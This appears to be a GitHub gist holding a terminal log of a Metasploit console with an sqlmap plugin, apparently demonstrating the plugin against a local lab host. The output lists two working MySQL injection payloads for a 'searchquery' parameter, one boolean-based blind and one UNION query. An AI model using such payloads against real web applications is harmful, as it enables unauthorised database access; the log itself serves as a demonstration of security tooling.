Created
July 4, 2014 03:45
-
-
Save brandonprry/ede22661373ff130f459 to your computer and use it in GitHub Desktop.
madness
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| bperry@w00den-pickle:~/tools/msf_dev$ ./msfconsole | |
| +-------------------------------------------------------+ | |
| | METASPLOIT by Rapid7 | | |
| +---------------------------+---------------------------+ | |
| | __________________ | | | |
| | ==c(______(o(______(_() | |""""""""""""|======[*** | | |
| | )=\ | | EXPLOIT \ | | |
| | // \\ | |_____________\_______ | | |
| | // \\ | |==[msf >]============\ | | |
| | // \\ | |______________________\ | | |
| | // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ | | |
| | // \\ | ********************* | | |
| +---------------------------+---------------------------+ | |
| | o O o | \'\/\/\/'/ | | |
| | o O | )======( | | |
| | o | .' LOOT '. | | |
| | |^^^^^^^^^^^^^^|l___ | / _||__ \ | | |
| | | PAYLOAD |""\___, | / (_||_ \ | | |
| | |________________|__|)__| | | __||_) | | | |
| | |(@)(@)"""**|(@)(@)**|(@) | " || " | | |
| | = = = = = = = = = = = = | '--------------' | | |
| +---------------------------+---------------------------+ | |
| =[ metasploit v4.9.0-dev [core:4.9 api:1.0] ] | |
| + -- --=[ 1292 exploits - 702 auxiliary - 202 post ] | |
| + -- --=[ 332 payloads - 33 encoders - 8 nops ] | |
| msf > load sqlmap | |
| [*] Sqlmap plugin loaded | |
| [*] Successfully loaded plugin: Sqlmap | |
| msf > sqlmap_connect 192.168.1.45 | |
| [+] Set connection settings for host 192.168.1.45 | |
| msf > sqlmap_get_data b65e0cff889246f3 | |
| Parameter Title Payload | |
| --------- ----- ------- | |
| searchquery MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) searchquery=fdsa' RLIKE (SELECT (CASE WHEN (3661=3661) THEN 0x66647361 ELSE 0x28 END)) AND 'YDkw'='YDkw&action=search | |
| searchquery MySQL UNION query (NULL) - 1 to 20 columns searchquery=fdsa' UNION ALL SELECT NULL,NULL,CONCAT(0x7165737371,0x4d684f55774f4c4d4346,0x7171716b71),NULL#&action=search | |
| msf > |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment